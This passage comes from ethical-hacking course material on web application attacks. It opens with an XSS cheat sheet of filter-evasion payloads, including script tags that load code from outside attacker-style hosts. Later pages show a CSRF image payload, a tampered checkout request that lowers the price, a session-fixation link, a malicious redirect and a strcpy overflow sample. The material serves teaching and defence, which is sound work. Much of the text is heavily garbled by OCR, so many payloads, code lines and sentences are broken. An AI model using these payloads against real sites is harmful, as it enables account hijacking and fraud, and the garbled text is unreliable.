XSS locator: !;-<XSS>=&{()} Normal XSS JavaScript injection: <SCRIPT SRC=http://haxkers.org/xss.jsx/S C R IPT > Image XSS: <IMG SRC=javascript:alert(XSS>;( N o q u o tesa n d no semicolon: <IMG SRC=javascript:alert(XSS')> Case insensitive XSS attack vector: <IMG SRC=JaVaScRiPt:alert('XSS>) HTML entities: <1MG SRC=javasa ipt: ale rt (&q u o t;XSS&q u o t; )> Grave accent obfuscation: <IMG SRC= javascript :alert(" RSnake says, 'XSS'T> M alformed IMG tags:<IMG " xSCRIPT>aiertf XSS" )</SCRIPT>" > Embedded tab: <IMG SRCJav ascript:alert('XSS');H > Embedded encoded tab: <IMG SRC jav& #x09;asalpt:ale rt (,XSS);" > Embedded tab: <IMG SRC="jav ascript:alert('XSS');"> Embedded encoded tab: <IMG SRCjav& #x09;asalpt:alert(XSS;(,> Em beded new line: <IMG SRC="jav&#xOA;ascript:alert('XSS');"> Embedded carriage return: <1MG SRC jav&#xOD;asaipt :alertfXSS> ;( NuN Chars: peri -e 'p rint "<1MG SRC=java\Osai p t: ale rt(\"XSS\" )>";'> out Non-aipha-non-digit XSS: <SCR1PT/XSS SRChttp://ha.dcers. 0fg/xss.js'x/SCRlPT>
CEH
UttifM itkiul
M m f e w
IMG Dynsrc: <1MG DYNSRC Javasaipt 3 lert<XSS> ( IMG lowsrc:<IMG DYNSRC jav a sa lp t: ale rtf XSS>( IMG lowsrc:<IMG LOWSRC "javasaipt :alert('XSS'("< BGSOUND:<BGSOUND SRC javasaipt :ale rt )XSS< ";( LAYER:<LAYER SRC= "http://haxkers.org/scriptlet.htm rx/LA Y ER > STYLE sh ee t: <LINK REL H stylesheet HREF " javasaipt :ale rt( XSS>;( Local htcfile:<XSSSTYLE" behavk>r: urHxssJttc);"> VBsaipt in an Image: <IMG SRC*v b s a ip t:m sgbox(XSS")> Mocha: <IMG SRC" livesaipt:[code]''> US-ASCII encoding: isaiptualert(EXSSE)i/saiptu META:<META HTTP-EQUIV*refresh CONTENT="0;uH=javasaipt:aiert(XSS>;) TABLE:<TABLE BACKGROUN Djav a sa ip t: alert( XSS>( TD:<TABLExTD BACKGROUN D Javasaipt :alert(XSS>(
Non-alpha-non-digit part 2 XSS: <BODY onload ! # $ % & ( ) - + 1 / ] @?;:,.\ K '= a le 1t< XSS>) Extraneous open brackets: SCRIPT>alert( XSS");///SCRlPT> No closing script tags: <SCRIPT SRChttp://ha.ckers.org/xss .js?<B> Protocol resolution in s a ip t tags: <SCRIPT SRC/ /h a x k e rs.org/.j> Half open HTML/JavaScript XSS vector: <IMG SRC=javascript :alert('XSS')" Double open angle brackets: <lframe src h ttp ://h a.c k e rs.org/saiptlet.htm i < XSS with no single qu o tes or double quotes or semicolons: SCRIPT>alert (/XSS/source K/SCRIPT> Escaping JavaScript escapes: \";alertCXSS');// End title tag: </TTTLExSCRIPT>ale rt(XSS<;)/SCRIPT> INPUT im age :<IN PUT TYPE " IMAGE" SRC="javasaipt :alert('XSS');">
XSS C h e a t S h e e t
XSS locator '.- <XSS> = *{()} Norm al XSS Ja va Script in action <SCRIPT SRC=nttp y/ha tte rs org/css.jsx7 SCRIPT>
Embedded carriage return: dM G SRC = 'jj0^ *rO O .ascn p te*ertfX SS> ; M * O m n pert-e ,p ra t '< M G SRC-yava\05cnpte*ertf\*XSSV > out MG (SK iC ^ clM G
0 v N s * c aist1 ju sd i s t
M G Ifw V C < M 6 *GSO UN D .BGSO UN D
6 * *
Mo q u otn 4 m xm icoto: <1MG Case *sen sitrve XSS a tta o vecto r <WAG
Wona!pr-nonStg:t XSS <SCR1FT/XSS SRC= nttpy/ha ckers org/1 <ss.jsxVSCRIFT> p v t 2 XSS <SOOY ) * - ? * I / - X S S > > Evtraneous open brackets <<SCRlRT>aJert ( TCSS y//5 C W FT >
S^ W O B S a R S JU S C ft* >
LAYER *LAVER SRC *H ttpy/ba.Aers.org/scr1ptiet-M m J x/lA YER > STYLE sheet: <UNK R E U - d # c fo rc T
HTML en tities *IM G
No Oasu^ scnpt ta^s: <SCRIPT SRC=attpy/aa-Cers.org/1 ss^s*<R>
HREF= ttW 6 5 0 lJ J 1 > fOiXSS >

Local etc ru e <xss S T n f : w iw o
G rave accent ofcfascatioa: d M G SRC
Protocol resolution m scnpt tags < SCRIPT T C SS")> SRC=//fca.clters.org/.j> Ha*f ope WTML/JavaScnp t X 5 vector d M G SR C = *|vaoq njt^ ier^ X SS7' Dootrte open an$te Dradcets < & rjO X Uj=tTttpy/ha.ckers.org/5cr1pt*et.tJtm< < XSS w rtt bo saagte quotes or doable q v o i n or sermcotoag: SCR*T>lert(/XSS/-S01rce></Sa1FT> Escaping Ja v a S o ft escapes W a te r* x s s y / Ena title tag < /T IT lEx SC R rT > alert(XSS^</SOOFT>
in p u t
M e !form es IM G tags d M G * * xSC R fPT > aJert{ X SS<> /SCRlPT>*> Emoedded ta tr d M G SRC=*jav w ^ t a k f ^ TCSS'J;> Em oeooes encoded tab : <IMG SRC=*|jQ(a1c09;a5cnpt a Je rtt'X S S '^ >
V Bsatp t in an im age. d M G SRC= Vtecript:m sgtx)cf*XSS7> Mocfca <JMG SRC=*vesonpt:fcodel*>
US-ASOI encoding g O T p yt> m lEX SSE fJ x z > p lv M ET A xM ET A W TTP-EQU/Vr-refiesir CONTENT= 0 :art=âvascnpt aftert fx SS > * TABLE cTABLE BACXG ROUNO= ^ T D x T A U fx T O IACKGROUM>= tva5 crt a*ertfTCSS7> f ft JTCSS')r >
sss!sji s '> :>
Embedded t a t dMG SRC=*jav
Embedded encoded ta b : IMG SRC = '0yâcO 9;ascnpt aer t( xss(.>
'fflww < **G S * C 1 y |M 1 flA n p t l rtlT C S S ).>
im age * in p u t t y p e =* im \ g e *
'iMKratf,c s s ,^ >
FIGURE 13.22: XSS Cheat Sheet
Module 13 Page 1794
C r o s s - S i t e R e q u e s t F o r g e r y (C S R F ) A tta c k
J
(*rtifxd 1 ltK4l IlMtm
c El \
Cross-Site R equest F o rgery (CSRF) a tta c k s e x p lo it w e b p a g e v u ln e ra b ilitie s th a t a llo w an a tta c k e r to fo rc e an u n s u s p e c tin g user's b ro w s e r to send m a lic io u s re quests th e y d id n o t in te n d
The v ic tim user h o ld s an a c tiv e session w ith a tru s te d s ite and s im u lta n e o u s ly visits a m a lic io u s site , w h ic h in je c ts an HTTP re q u e s t fo r th e tru s te d s ite in to th e v ic tim user's session, c o m p ro m is in g its in te g rity
fc
User
Logs into the trusted site and creaitesa news! :sion Stores the session ident fierforthe session in a cookie in the web browser
Trusted Website >
Malicious Website
___
..... 1
...
Sends a request fromthe user's ! using his session cookie
41!
C r o s s - s i t e R e q u e s t F o r g e r y (C S R F ) A tta c k
Cross-site request forgery is also known as a one-click attack. CSRF occurs when a user's web browser is instructed to send a request to the venerable website through a malicious web page. CSRF vulnerabilities are very commonly found on financial-related websites. Corporate intranets usually can't be accessed by the outside attackers so CSRF is one of the sources to enter into the network. The lack of the web application to differentiate a request done by malicious code from a genuine request exposes it to CSRF attack. Cross-Site request forgery (CSRF) attacks exploit web page vulnerabilities that allow an attacker to force an unsuspecting user's browser to send malicious requests they did not intend. The victim user holds an active session with a trusted site and simultaneously visits a malicious site, which injects an HTTP request for the trusted site into the victim user's session, compromising its integrity.
Module 13 Page 1795
O
User
Logs into the trusted site and creates a new se sion !esslon Identffl er for the Stores the s session In a clookle In the w eb browser
Trusted W ebsite
Malicious W ebsite
Sends a request from the user's browser using his session cookie
> a ft
Visits a ma
III
FIGURE 13.23: Cross-site Request Forgery (CSRF) Attack
Module 13 Page 1796
H ow C SR F A tta c k s W o rk
In a cross-site request forgery attack, the attacker waits for the user to connect to the trusted server and then tricks the user to click on a malicious link containing arbitrary code. W hen the user clicks on the malicious link, the arbitrary code gets executed on the trusted server. The following diagram explains the step-by-step process of a CSRF attack:
Module 13 Page 1797
Client Side Code

Symbol k Shares
< fo rm a c tio n = b u y .p h p " m eth o d = "P O S T "> U se r logs in to tr u s t e d s e r v e r using his c r e d e n tia ls
< < ?p h p
S e rve r Code
s e s s io n _ s t a r t ( ) ; if (is s e t($ _ R E Q U E S T [' s y m b o l']
o
Server sets a session cookie In the user's browser Malicious code is executed in the trusted server
& &
i s s e t ($_REQUEST [ s h a re s ' ] ) )
{ b u y _ s t o c k s ($ _ R E Q U E S T [ s y m b o l ] , $_REQUEST[ s h a r e s ] ) ; }
r
Trusted Server
<p>Symbol: <input type= "text" name-symbor /x/p> <p>Shares: <input type-'text" name='shares'' /></p> <pxinput type="submit" value="Buy'' /></p> </form>r
?>
Attacker sends a phishing mail tricking user to send a request to a malicious site
Attacker
Response page contains malicious code
M alicious Code
0
User requests a page from the malicious server
< im g s r a = " h t t p : / / j u g g y b o y . o o ra / j u g g y s h o p . p h p ? s y m b o l= M S F T & s h a r e s = 1 0 0 0 ,r />
Malicious Server
FIGURE 13.24: How CSRF Attacks Work
Module 13 Page 1798
Web Application Denial-of-Service (DoS) Attack

Attackers exhaust available server resources by sending hundreds of resource-intensive requests, such as pulling out large image files or requesting dynamic pages that require expensive search operations on the backend database servers Reasonable Use of Expectations -
C EH
W h y A re A p p lications V u ln e ra b le ?
Application Environment Bottlenecks Implementation Flaws Poor Data Validation
W eb S e rve r Resource C on sum ptio n
W eb S e rv ic e s U n a v a ila b ility
Targets
i : : i : CPU, Memory, and Sockets Disk Bandwidth Database Bandwidth
Application-level DoS attacks emulate the
BOB BOB
same request syntax and network-level traffic characteristics as that of the legitimate clients, which makes it undetectable by existing DoS protection measures : :
- Worker Processes
Copyright by EG-G0 llia l. All Rights Reserved. Reproduction is Strictly Prohibited.
W e b A p p l i c a t i o n D e n i a l o fS e r v ic e (D oS) A tta c k
______ Denial-of-service attacks happen when the legitimate users are prevented from performing a desired task or operation. Attackers exhaust available server resources by sending hundreds of resource-intensive requests, such as pulling out large image files or requesting dynamic pages that require expensive search operations on the backend database servers. The following issues make the web applications vulnerable: 0 Reasonable Use of Expectations
Application Environment Bottlenecks e Implementation Flaws Poor Data Validation
Application-level DoS attacks emulate the same request syntax and network-level traffic characteristics as that of the legitimate clients, which makes it undetectable by existing DoS protection measures. In web application denial-of-service attack the attacker targets and tries to exhaust CPU, memory, Sockets, disk bandwidth, database bandwidth, and worker processes.
Some of the common ways to perform a web application DoS attack are:
0 Bandwidth consumption-flooding a network with data
Module 13 Page 1799
Resource starvation-depleting a system's resources Programming flaws-exploiting buffer overflows Routing and DNS attacks-manipulating DNS tables to point to alternate IP addresses
Module 13 Page 1800

Denial-of-Service (DoS) Examples

User Registration DoS
C EH
The attacker could create a program that submits the registration forms repeatedly, adding a large number of spurious users to the application
Login Attacks
The attacker may overload the login process by continually sending login requests that require the presentation tier to access the authentication mechanism, rendering it unavailable or unreasonably slow to respond
User Enumeration
If application states which part of the user name/password pair is incorrect, an attacker can automate the process of trying common user names from a dictionary file to enumerate the users of the application
Account Lock Out Attacks
The attacker may enumerate user names through another vulnerability in the application and then attempt to authenticate to the site using valid user names and incorrect passwords, which will lock out the accounts after the specified number of failed attempts. At this point legitimate users will not be able to use the site
D e n i a l o fS e r v ic e (D oS ) E x a m p l e
Most web applications are designed to serve or withstand with limited requests. If the limit is exceeded, the web application may fail the server the additional requests. Attackers use advantage to launch denial-of-service attacks on the web applications. Attackers send too many requests to the web application until it gets exhausted. Once the web application receives enough requests, it stops responding to other request though it is sent by an authorized user. This is because the attacker overrides the web application with false requests. Various web application DoS attacks include: 6
User Registration DoS: The attacker could create a program that submits the
registration forms repeatedly adding a large number of spurious application. users to the
Login Attacks: The login procedure is overloaded by the attacker by repeatedly

transferring login requests that need the presentation tier to admit the request and access the verification instructions. When the requests are overloaded, then the process becomes slow or unavailable to the genuine users. Q
User Enumeration: W hen the application responds to any user authentication process
with the error message declaring the area of incorrect information, then the attacker can easily manipulate the procedure by brute forcing the common user names from a dictionary file to estimate the users of the application.
Module
13 Page 1801
Ethical Hacking and Countermeasures Copyright by
EC-C0UnCil
Account Lock-Out Attacks: Dictionary attacks can be minimized by applying the account lock method. The attacker may enumerate user names through vulnerability in the application and then attempt to authenticate the site using valid user names and incorrect passwords that will lock out the accounts after the specified number of failed attempts. At this point, legitimate users will not be able to use the site.
Module 13 Page 1802
B u ffe r O v e rflo w A tta c k s

Buffer overflow occurs when an application writes more data to a block of memory, or buffer, than the buffer is allocated to hold
CEH
A buffer overflow attack allows an attacker to modify the target process's address space in order to control the process execution, crash the process, and modify internal variables Attackers modify function pointers used by the application to direct program execution through a jump or call instruction and points it to a location in the memory containing malicious codes
V Vulnerable Code
i n t m a in (in t a rg c , c h a r * a r g v []) ch a r *d e s t_ b u ffe r; d e s t _ b u f f e r = (c h a r * ) m a l l o c ( 1 0 ) ; if (N ULL = -1 ; { d e s t_ b u f f e r ) {
re tu rn if
(a r g c > 1 )
s trc p y (d e s t_ b u ffe r, a rg v [1 ] ) ; p r in t f (" T h e a rg u m e n t i s f i r s t oo m n a n d - lin e % s .\ n , d e s t _ b u f f e r );
e l s e { p r i n t f ( " N o com m an d -lin e a rg u m e n t w as g i v e n . \ n " ) ; } f re e (d e s t_ b u ffe r) ; re tu rn

0;
Note: For complete coverage of buffer overflow concepts and techniques, refer to Module 18: Buffer Overflow
B u f f e r O v e r f lo w A t t a c k s
A buffer has a specified data storage capacity, and if the count exceeds the original, the buffer overflows; this means that buffer overflow occurs when an application writes more data to a block of memory, or buffer, than the buffer is allocated to hold. Typically, buffers are developed to maintain finite data; additional information can be directed wherever it needs to go. However, extra information may overflow into neighboring buffers, destroying or overwriting legal data.
A rbitrary Code
A buffer overflow attack allows an attacker to modify the target process's address space in order to control the process execution, crash the process, and modify internal variables. When a buffer overflows, the execution stack of a web application is damaged. An attacker can then send specially crafted input to the web application, so that the web application executes the arbitrary code, allowing the attacker to successfully take over the machine. Attackers modify function pointers used by the application to redirect the program execution through a jump or call instruction to a location in the memory containing malicious code. Buffer overflows are not easy to discover, and even upon discovery they are difficult to exploit. However, the attacker who recognizes a potential buffer overflow can access a staggering array of products and components.
Module 13 Page 1803
Buffer Overflow Potential

Both the web application and server products, which act as static or dynamic features of the site or of the web application, contain the potential for a buffer overflow error. Buffer overflow potential that is found in server products is commonly known and creates a threat to the user of that product. W hen web applications use libraries, they become vulnerable to a possible buffer overflow attack. Custom web application code, through which a web application is passed, may also contain buffer overflow potential. Buffer overflow errors in a custom web application are not easily detected. There are fewer attackers who find and develop such errors. If it is found in the custom application (other than crash application), the capacity to use this error is reduced by the fact that both the source code and error message are not accessible to the attacker.
V ulnerable Code
i n t m a in (in t a rg c, char * d e s t_ b u ffe r ; d e s t_ b u ffe r = (ch ar *) m a llo c (lO ); if (NULL = = d e s t_ b u ffe r ) char * a r g v [ ] ) {
re tu rn -1; if (arg c > 1) {
s t r c p y (d e s t _ b u f f e r , a r g v [ l ] ) ; p r in t f ( " T h e f i r s t command-line argument i s % s .\ n ", e ls e d e s t_ b u ffe r); } } fre e (d e s t_ b u ffe r);
{ p r in t f ( " N o command-line argument was g iv e n .\ n ; ) }
re tu rn 0;
Note: For complete coverage of buffer overflow concepts and techniques, refer to Module 17:
Buffer Overflow Attacks.
Module
13 Page 1804
C ookie/Session Poisoning
CEH
Urt>fW4 I itkitjl Nm Im
Cookies are used to m a in ta in se ssio n s ta te in the otherwise stateless HTTP protocol
Modify th e Cookie Content
Inject th e Malicious Content
Rewriting th e Session Data
Cookie poisoning attacks involve the modification of the contents of a cookie (personal information stored in a web user's computer) in order to bypass security mechanisms A
Poisoning allows an attacker to inject the malicious content, modify the user's online experience, and obtain the unauthorized information
A proxy can be used for rewriting the session data, displaying the cookie data, and/or specifying a new user ID or other session identifiers in the cookie
C o o k ie /S e s s io n P o is o n in g
Cookies frequently transmit sensitive credentials and can be modified with ease to escalate access or assume the identity of another user. Cookies are used to maintain a session state in the otherwise stateless HTTP protocol. Sessions are intended to be uniquely tied to the individual accessing the web application. Poisoning of cookies and session information can allow an attacker to inject malicious content or otherwise modify the user's on-line experience and obtain unauthorized information. Cookies can contain session-specific data such as user IDs, passwords, account numbers, links to shopping cart contents, supplied private information, and session IDs. Cookies exist as files stored in the client computer's memory or hard disk. By modifying the data in the cookie, an attacker can often gain escalated access or maliciously affect the user's session. Many sites offer the ability to "Remember m e?" and store the user's information in a cookie, so he or she does not have to re-enter the data with every visit to the site. Any private information entered is stored in a cookie. In an attempt to protect cookies, site developers often encode the cookies. Easily reversible encoding methods such as Base64 and ROT13 (rotating the letters of the alphabet 13 characters) give many who view cookies a false sense of security.
Module 13 Page 1805
Threats The compromise of cookies and sessions can provide an attacker with user credentials, allowing the attacker to access the account in order to assume the identity of other users of an application. By assuming another user's online identity, the original user's purchase history can be reviewed, new items can be ordered, and the services and access that the vulnerable web application provides are open for the attacker to exploit. One of the easiest examples involves using the cookie directly for authentication. Another method of cookie/session poisoning uses a proxy to rewrite the session data, displaying the cookie data and/or specifying a new user ID or other session identifiers in the cookie. Cookies can be persistent or non-persistent and secure or non-secure. It can be one of these four variants. Persistent cookies are stored on a disk and non-persistent cookies are stored in memory. Secure cookies are transferred only through SSL connections.
Module 13 Page 1806
How Cookie Poisoning Works

GET /store/buy.aspx?checkout=yes HTTP/1.0 Host www.juggyshop.com Accept /* Referrer: http://www.juggyshop.com/showprods.aspxCookie: SESSIONID=325896ASDD23SA3587; BasketSize=3; lteml=1258; . Item2=2658; Item3=6652; TotalPrice=11568;
Web server replies with requested page and sets a cookie on the user's browser
User browses a web page
Attacker steals cookie (Sniffing, XSS, phishing attack)
GET /stor^buy.aspx?checkout*yes HTTP/1.0 Host www.juggyshop.com Accept: / Referrer: http://www.juggyshop.com/showprods.aspx Cookie: SESSIONID*325896ASDD23SA3587; BasketSlze3; lteml1258; Item2=2658; Item36652; TotalPrlce*100;
Attacker orders for product using modified cookie
Product is delivered to attacker's address
A tta c k e r
H o w C o o k ie P o i s o n i n g W o r k s
Cookies are mainly used by web applications to simulate a stateful experience depending upon the end user. They are used as an identity for the server side of web application components. This attack alters the value of a cookie at the client side prior to the request to the server. A web server can send a set cookie with the help of any response over the provided string and command. The cookies are stored on the user computers and are a standard way of recognizing users. All the requests of the cookies have been sent to the web server once it has been set. To provide further functionality to the application, cookies can be modified and analyzed by JavaScript. In this attack, the attacker sniffs the user's cookies and then modifies the cookie parameters and submits to the web server. The server then accepts the attacker's request and processes it.
Module 13 Page 1807
The following diagram clearly explains the process of a cookie poisoning attack:
GET /store/buy.* spx?checkout-yesHI IP/1.0 Host: www.juggybhop.com Accept: */* Referrer: http://www.juggyshop.com/showprods.dspxCookie: SESSIONID-32b896A$DD23SA3587; BasketSize-3;lteml-1258; ltem2-2658; ltem3-6652; TotalPrice-11568;
A Webserver
Webserver replies with requested page and sets a cookie on the user's browser
User browses a web page
Attacker steals cookie (Sniffing, XSS, phishing attack)
GET /store/buy.aspx?checkout=yes HTTP/1.0 Host: www.juggyshop.com Accept: */* Referrer: http://www.juggyshop.com/showprods.aspx Cookie: SESSIONID-325896ASDD23SA3587; BasketSize=3; lteml-1258; Item2=2658; I t e m36652 ; TotalPrice-100;
Attacker orders for product using modified cookie
Product is delivered to attacker's address
Attacker
FIGURE 13.25: How Cookie Poisoning Works
Module 13 Page 1808
S e s s io n F ix a tio n A tta c k
In a session fixation attack, the attacker tricks the user to access a genuine web server using an explicit session ID value
CEH
Attacker assumes the identity of the victim and exploits his credentials at the server
Attacker logs on to the bank w ebsite using his credentials Web server sets a session ID on the attacker's machine
Server
(juggybank.com) Attacker logs into the server using the victim's credentials w ith the same session ID
Attacker
Attacker sends an email containing a link with a fix session ID
|1 g o
A A
h t t p : / / ju g g y b a n k .d o m / lo g in . ja p ? s e s s io n id = 4321
User clicks on the link and is redirected to the bank w ebsite
I t
User
User logs into the server using his credentials and fixed session ID
S e s s io n F i x a t i o n A t t a c k s
Session fixation helps an attacker to hijack a valid user session. In this attack, the attacker authenticates him or herself with a known session ID and then lures the victim to use the same session ID. If the victim uses the session ID sent by the attacker, the attacker hijacks the user validated session with the knowledge of the used session ID. The session fixation attack procedure is explained with the help of the following diagram:
Attacker logs on to the bank w eb site using his credentials W ebserver sets a session ID on the attacker's machine
Server
Attacker logs into the server using the victim's credentials w ith the sam e session ID
Attacker
Attacker sends an email containing a link with a fix session ID
(juggybank.com)
h t t p : / / ju g g y b a n k .d o m / lo g in . j s p ? s e s s io n id = 4321
User clicks on th e link and is redirected to the bank w eb site User logs into the se rve r using his credentials and fixed session ID
User
FIGURE 13.26: How Cookie Poisoning Works
Module 13 Page 1809
Insufficient Transport Layer Protection

Insufficient transport layer protection supports weak algorithms, and uses expired or invalid certificates
CEH
Underprivileged SSL setup can also help the attacker to launch phishing and MITM attacks
This vulnerability exposes user's data to untrusted third parties and can lead to account theft
In s u ffic ie n t T ra n s p o rt L a y e r P ro te c tio n
SSL/TLS authentication should be used for authentication on the websites or the attacker can monitor network traffic to steal an authenticated user's session cookie. Insufficient transport layer protection may allow untrusted third parties to obtain unauthorized access to sensitive information. The communication between the website and the client should be properly encrypted or data can be intercepted, injected, or redirected. Various threats like account thefts, phishing attacks, and admin accounts may happen after systems are being compromised.
Module 13 Page 1810
Im proper Error H andling

J Im p r o p e r e r r o r h a n d lin g g iv e s in s ig h t in t o s o u rc e c o d e s u c h as lo g ic fla w s , d e fa u lt a c c o u n ts , e tc . U s in g th e in f o r m a t io n re c e iv e d fr o m a n e r r o r m e s s a g e , a n a tta c k e r id e n tifie s v u ln e r a b ilitie s
CEH
Information Gathered
e Out of memory Null pointer exceptions System call failure
lo o
httpy/j uggyboy.conV
Boy .1
General Error
Could not obtain post/user Information DEBUG MODE SQL Erroc: 1016 Can't open file: 'nuke_bbposts_text.MYO'. (errno: 14S) SELECT u.username, u.u serjd, u.user_posts, u.user_from, u.user_webs!te. u.user_ema 1l, u.usermsnm, u. use r_vl ewe mail, u.user_rank, u.user_sig, u.user_sig_bbcode_uid, u.user_alowsmile, p.*, pt.postjext, ptpost_subject pt.bbcode.uid FROM nuke_bbposts p, nuke_usersu, nuke_bbposts_text pt WHERE p.topicJ d 1 54 7 'AND pt.postJd p.postJd AND u.userjd =p.posterjd ORDER BY p.post.time ASC LI MIT 0, I S Line: 43S File:/user/home/geeks/www/vonage/module s/Forums/vi ewtope.php
Database unavailable Network timeout S e Database information Web application logical flow
9 Application environment
Copyright by E&Cauacfl.All Rights Reserved. Reproduction is Strictly Prohibited.
JJwSi Im p ro p e r E rro r H an d lin g
e l
Improper error handling may result in various types of issues for a website exclusively
related to security aspects, especially when internal error messages such as stack traces, database dumps, and error codes are displayed to the attacker. An attacker can get various details related to the network version, etc. Improper error handling gives insight into source code such as logic flaws, default accounts, etc. Using the information received from an error message, an attacker identifies vulnerabilities for launching attacks. Improper error handling may allow an attacker to gather information such as: e e e 0 Q e e Out of memory Null pointer exceptions System call failure Database unavailable Network timeout Database information W eb application logical flow Application environment
Module 13 Page 1811
Insecure Cryptographic Storage
CEH
!.
j!
In s e c u re C ry p to g ra p h ic S torage
W eb applications use cryptographic algorithms to encrypt their data and other
sensitive information that is transferred from server to client or vice versa. The web application uses cryptographic code to encrypt the data. Insecure cryptographic storage refers to when an application uses poorly written encryption code to securely encrypt and store sensitive data in the database. The insecure cryptographic storage mentions the state of an application where poor encryption code is used for securely storing data in the database. So the insecure data can be easily hacked and modified by the attacker to gain confidential and sensitive information such as credit card information, passwords, SSNs, and other authentication credentials with appropriate encryption or hashing to launch identity theft, credit card fraud, or other crimes. Developers can avoid such attacks by using proper algorithms to encrypt the sensitive data. The following pictorial representation shows the vulnerable code that is poorly encrypted and secure code that is properly encrypted using a secure cryptographic algorithm.
Module 13 Page 1812
F IG U R E 13.27: Insecure Cryptographic Storage
Module 13 Page 1813
Broken Authentication and Session Management

B An attacker uses vulnerabilities in the authentication or session m an agem en t functions such as exposed accounts, session IDs, logout, password m anagem ent, tim eouts, rem em ber me, secret question, account update, and others to im personate users
CEH
Session ID in URLs
http://juggyshop.com/sale/saleitems=30 4;jsessionid120 MTOIDPXMOOQSABGCK LHCJUN2JV?destNewMexico
Password Exploitation
Attacker gains access to the web application's password database. If user passwords are not encrypted, the attacker can exploit every users' password
Tim eout Exploitation

If an application's tim eouts are not set properly and a user simply closes the browser w ithout logging out from sites accessed through a public computer, the attacker can use the same browser later and exploit the user's privileges
Attacker sniffs the netw ork traffic or tricks the user to get the session IDs, and reuses the session IDs for malicious purposes
B ro k e n A u th e n tic a tio n a n d S e s s io n M a n a g e m e n t
Authentication and session management includes every aspect of user authentication and managing active sessions. Yet times solid authentications also fail due to weak credential functions like password change, forgot my password, remember my password, account update, etc. Utmost care has to be taken related to user authentication. It is always better to use strong authentication methods through special software- and hardware-based cryptographic tokens or biometrics. An attacker uses vulnerabilities in the authentication or session management functions such as exposed accounts, session IDs, logout, password management, timeouts, remember me, secret question, account update, and others to impersonate users.
Session ID in URLs
1
An attacker sniffs the network traffic or tricks the user to get the session IDs, and reuses the session IDs for malicious purposes.
Example: http://iuggvshop.com/sale/saleitems=304;isessionid=120MTOIDPXMOOQSABGCKLHCJUN2JV?d est=NewMexico
Module 13 Page 1814
Tim eout Exploitation

If an application's timeouts are not set properly and a user simply closes the browser without logging out from sites accessed through a public computer, the attacker can use the same browser later and exploit the user's privileges.
gjjgn Passw ord Exploitation

An attacker gains access to the web application's password database. If user passwords are not encrypted, the attacker can exploit every users' password.
Module 13 Page 1815
Unvalidated Redirects and Forwards

J U n v a lid a te d re d ire cts e n a b le a ttack ers to install m a lw a re or trick victim s into disclosing p a ssw o rd s o r o th e r se n sitive in fo rm a tio n , w h e re a s u n safe fo rw a rd s m a y a llo w access co n tro l b yp ass
CEH
Urt1fw4 ilhiul lUtbM
Unvalidated Redirect
Attacker sends an email containing rewrite link to malicious server

( h t tp : //w w w . iu g g y b o y .c o m /r e d ir e c tJ s p K ?
User is redirected to attacker's server
=h ttp ://w w w .evilserver.com)
User
Malicious Server
Unvalidated Forward
Attacker requests page from server with a forward http://www.juggyshop.com/purch . ase.jsp?fwd=admin.jsp
loo
http.//www,Ju|Cfy%hop-10m /*dm 1f1^ vp
Administration Page
^ I t Create price list Attacker is forwarded to admin page Q Create item listing
B6_____
Server
* 1 Purchase records
3 Registered users
Attacker
U n v a lid a te d R e d ire c ts a n d F o rw a rd s
An attacker links to unvalidated redirects and lures the victim to click on it. When the
victim clicks on the link thinking that it is a valid site, it redirects the victim to another site. Such redirects lead to installation of malware and even may trick victims into disclosing passwords or other sensitive information. An attacker targets unsafe forwarding to bypass security checks. Unsafe forwards may allow access control bypass leading to: 0 0 Session Fixation Attacks Security Management Exploits Failure to Restrict URL Access Malicious File Execution
Module 13 Page 1816
Unvalidated Redirect
Attacker sends an email
User is redirected to
containing rewrite link to malicious server
attacker's server
Attacker
(h t t p : / / w w w . ju g g Y b o y . c o m / r e d i r e c t . a s p x ? h ttp ://w w w .e v il5 e r v e r .c o m )
User
Unvalidated Forward
Administration Page
Attacker requests page from server with a forward
http://www .juggyshop.com/purch ase.jsp?fwd=admin.jsp Create price list Create item listing
Attacker is forwarded to admin page
* 1 Purchase records
3 Registered users
Attacker
Server
F IG U R E 13.28: U n valid ated Redirects and Forw ards
Module 13 Page 1817
Web Services A rchitecture
C EH
X M L , SOAP, W SD L, S ch e m a , W S - A d v e rtis in g , e tc .
.Net TCP Channel, Fast InfoSet, etc.
W eb S ervices A rch ite c tu re

* T O
WSWork Processes
W S Security
WS-Federation WSPolicy WS Security Policy
WS-SecureConversion WS-Trust
XML Encryption
SAML Kerberos X.509 Security Token Profiles
:1
XML Digital Signatures
XML, SOAP, WSDL, Schema, WS-Advertising, etc. HTTP

j .Net TCP Channel, Fast InfoSet, etc.
FIGURE 13.29: Web Services Architecture
Module 13 Page 1818
Web Services Attack

0
Web services evolution and its increasing use in business offers new attack vectors in an application framework
U ilifM
C EH
IU mjI NMhM
Web services are based on XML protocols such as Web Services Definition Language (WSDL) for describing the connection points; Universal Description, Discovery, and Integration (UDDI) forthe description and discovery of web services; and Simple Object Access Protocol (SOAP) for communication between web
^ 4 ^1 ^ e b S ervices A ttack
W eb services evolution and its increasing use in business offers new attack vectors in an application framework. W eb services are process-to-process communications that have special security issues and needs. W eb services are based on XML protocols such as W eb Services Definition Language (WSDL) for describing the connection points; Universal Description, Discovery, and Integration (UDDI) for the description and discovery of web services; and Simple Object Access Protocol (SOAP) for communication between web services that are vulnerable to various web application threats. Similar to the way a user interacts with a web application through a browser, a web service can interact directly with the web application without the need for an interactive user session or a browser. These web services have detailed definitions that allow regular users and attackers to understand the construction of the service. In this way, much of the information required to fingerprint the environment and formulate an attack is provided to the attacker. It is estimated that web services reintroduce 70% of the vulnerabilities on the web. Some examples of this type of attack are: Q An attacker injects a malicious script into a web service, and is able to disclose and modify application data. An attacker is using a web service for ordering products, and injects a script to reset quantity and status on the confirmation page to less than what was originally ordered.
Module 13 Page 1819
In this way, the system processing the order request submits the order, ships the order, and then modifies the order to show that a smaller number of products are being shipped. The attacker winds up receiving more of the product than he or she pays for.
Module 13 Page 1820
Web Services Footprinting Attack

J A tta c k e rs f o o t p r i n t a w e b a p p lic a tio n to g e t U D D I in f o r m a t io n s u c h as b u s in e s s E n tity , b u s in e s S e rv ic e , b in d in g T e m p la te , a n d tM o d e l
CEH
Crt1fW 4 itfciul Nm Im
XM L Query
